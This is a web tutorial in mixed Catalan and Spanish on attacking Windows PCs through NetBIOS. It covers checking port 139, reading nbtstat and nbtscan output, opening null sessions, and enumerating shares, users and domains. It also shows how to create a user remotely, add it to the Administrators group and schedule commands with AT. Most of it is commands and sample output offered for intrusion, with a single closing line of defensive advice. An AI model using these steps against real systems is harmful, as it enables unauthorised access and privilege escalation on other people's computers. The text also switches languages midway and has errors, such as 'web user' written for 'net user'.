Hacking amb NetBIOS
En esta web se mostrarán diferents maneres de sacar tots los dades possibles a un PC remoto mediante NetBIOS.
El primer de tot és comprovar que l'equip al qual volem connectar-nos té el port NetBIOS obert, el port és el 139; es pot fer mitjançant la consola de MSDOS amb aquest comandament: telnet DIRECCIÓIP 139 i si es connecta el tindrà obert i si no doncs a buscar un altre PC.
El segon més important és tenir la taula NetBios, que ens indicarà quins serveis té en execució l'equip remot que comprobarem amb els resultats obtinguts amb posteriors comandaments
|
Nom
|
Sufix
|
Tipus
|
Servei
|
| <nomdequipment> |
00
|
U
|
Servei d'estació de treball |
| <nomdequipment> |
01
|
U
|
Servei de missatgeria |
| <_MSBROWSE_> |
01
|
G
|
Master Browser |
| <nomdequipment> |
03
|
U
|
Servei de missatgeria |
| <nomdequipment> |
06
|
U
|
Servei de servidor RAS |
| <nomdequipment> |
1F
|
U
|
Servei NetDDE |
| <nomdequipment> |
20
|
U
|
Servei de servidor de fitxers |
| <nomdequipment> |
21
|
U
|
Servei de client RAS |
| <nomdequipment> |
22
|
U
|
Intercanvi d'Exchange |
| <nomdequipment> |
23
|
U
|
Emmagatzematge d'Exchange |
| <nomdequipment> |
24
|
U
|
Directori d'Exchange |
| <nomdequipment> |
30
|
U
|
Servei de compartició de modem |
| <nomdequipment> |
31
|
U
|
Servei de client de compartició de modem |
| <nomdequipment> |
43
|
U
|
Control remot del client SMS |
| <nomdequipment> |
44
|
U
|
Eina de control remot d'administració SMS |
| <nomdequipment> |
45
|
U
|
Xat remot del client SMS |
| <nomdequipment> |
46
|
U
|
Transferència remota del client SMS |
| <nomdequipment> |
4C
|
U
|
Servei DEC Pathworks TCPIP |
| <nomdequipment> |
52
|
U
|
Servei DEC Pathworks TCPIP |
| <nomdequipment> |
87
|
U
|
Exchange MTA |
| <nomdequipment> |
6A
|
U
|
Exchange IMC |
| <nomdequipment> |
BE
|
U
|
Agent de monitoratge de xarxa |
| <nomdequipment> |
BF
|
U
|
Aplicacions de monitoratge de xarxa |
| <username> |
03
|
U
|
Servei de missatgeria |
| <domain> |
00
|
G
|
Domain Name |
| <domain> |
1B
|
U
|
Navegador principal de domini |
| <domain> |
1C
|
G
|
Domain Controllers |
| <domain> |
1D
|
U
|
Master Browser |
| <domain> |
1E
|
G
|
Eleccions del servei de navegador |
| <Serveis INet~> |
1C
|
G
|
Internet Information Server |
| <IS~Nom_ordinador> |
00
|
U
|
Internet Information Server |
Amb aquesta comanda de MSDOS podrem saber quins serveis s'executen a la màquina remota: nbtstat -A DIRECCIÓIP o nbtstat -a NOMPC. A més, això també ens donarà l'adreça MAC per si ens interessés.
 Com podem veure a la imatge fem un nbtstat a una IP o nomPC i ens dóna aquests resultats, que els comparem amb la taula NetBIOS i extreurem dades interessants com el seu usuari, el domini al qual pertany… i si fos un Controlador de Domini veuríem els serveis que s'executen. |
Per establir el que es diu sessió nul·la, hem d'executar aquesta comanda: net use DIRECCIÓIPIPC$ “”/u:”” . Lo que realmente hace este comando es autenticarse en el PC remoto con el usuario anònim.
Para autenticarnos en un equip remoto amb un usuario en concreto: net use DIRECCIONIP /u:USUARIO CONTRASEÑA o net use DIRECCIONIPC$ /u:USUARIO CONTRASEÑA o net use DIRECCIONIPRECURSO /u:USUARIO CONTRASEÑA… Una vez autenticados en el host remoto para ver el contingut de la carpeta se puede hacer net view DIRECTIONIP y veremos el contenido via MSDOS, pero també, puedes hacer, INICIO > EJECUTAR y pones lo que quieras: DIRECCIONIP o DIRECCIONIPRECURSO y te mostrará con la ventana del explorador de Windows el contenido.
Ver la hora remota: net time DIRECCIONIP
Ver dominios disponibles: net view /domain
Ver equipos de un dominio concreto: net view /domain:BUJARRA
Ver los usuarios de un equipo: web user
Ver los detalles de un usuario: net user nombreusuario
Crear un usuario: net user nombreusuario contraseña /ADD (Ideal para crear un usuario en un PC remoto con el comando AT)
Borrar un usuario: net user nombreusuario /DELETE
Ver los grupos de un PC: net group
Meter a un usuario en un grupo: net group nombregrupo nombreusuario /ADD (Ideal para meter en grupo Administradores al usuario que hemos creado remotamente en un PC)
Sacar a un usuario de un grupo: net group nombregrupo nombreusuario /DELETE
Comando AT, para ejecutar cosas en remoto. Con el comando at DIRECCIONIP veremos las tareas programadas que tiene su equipo y con el comando at DIRECCIONIP 21:30 /INTERACTIVE “comando de msdos a ejecutar en el PC remoto”. En el comando anterior el valor 21:30 es la hora a la que le he puesto yo que se ejecute el comando de MSDOS que va entre comillas, así que se le puede poner cualquier hora, pero primero mira mejor que hora tiene!
La herramienta del Kit de Recursos de MS Windows nltest.rar mostra els controladors de domini d'un domini concret, exemple:
C:>nltest /dclist:bujarra.com
Llista de DCS al domini bujarra.com
bujarra01
Interessant seriaal programa Nbtscan que el que fa és un ‘nbtstat’ de tota una xarxa a una velocitat impressionant. Exemple:
C:>nbtscan 192.168.0.0/24
 Fent escaneig de noms NBT per adreces de 192.168.0.0/24
 Adreça IP  Servidor NetBIOS  Servidor  Usuari  Adreça MAC
 —————————————————————————–
 192.168.0.0  Sendto ha fallat: No es pot assignar l'adreça sol·licitada
 192.168.0.1  BUJARRA01 <server> <unknown>  00-e0-7d-78-11-e6
 192.168.0.13  MARIA <server>  MARIA  00-e0-7d-76-5a-2b
 192.168.0.55  VICETOPC <server>  VICETO 00-00-f8-30-fa-23
 192.168.0.100  Recvfrom ha fallat: Connexió reiniciada pel peer
Per a protegir-nos d’aquest tipus d’atacs hem de o tancar el port 139 al router, o habilitarem el tallafoc a XP o eliminarem el servei de compartir carpetes i impressores per a xarxes Microsoft (en qualsevol S.O. de Microsoft).
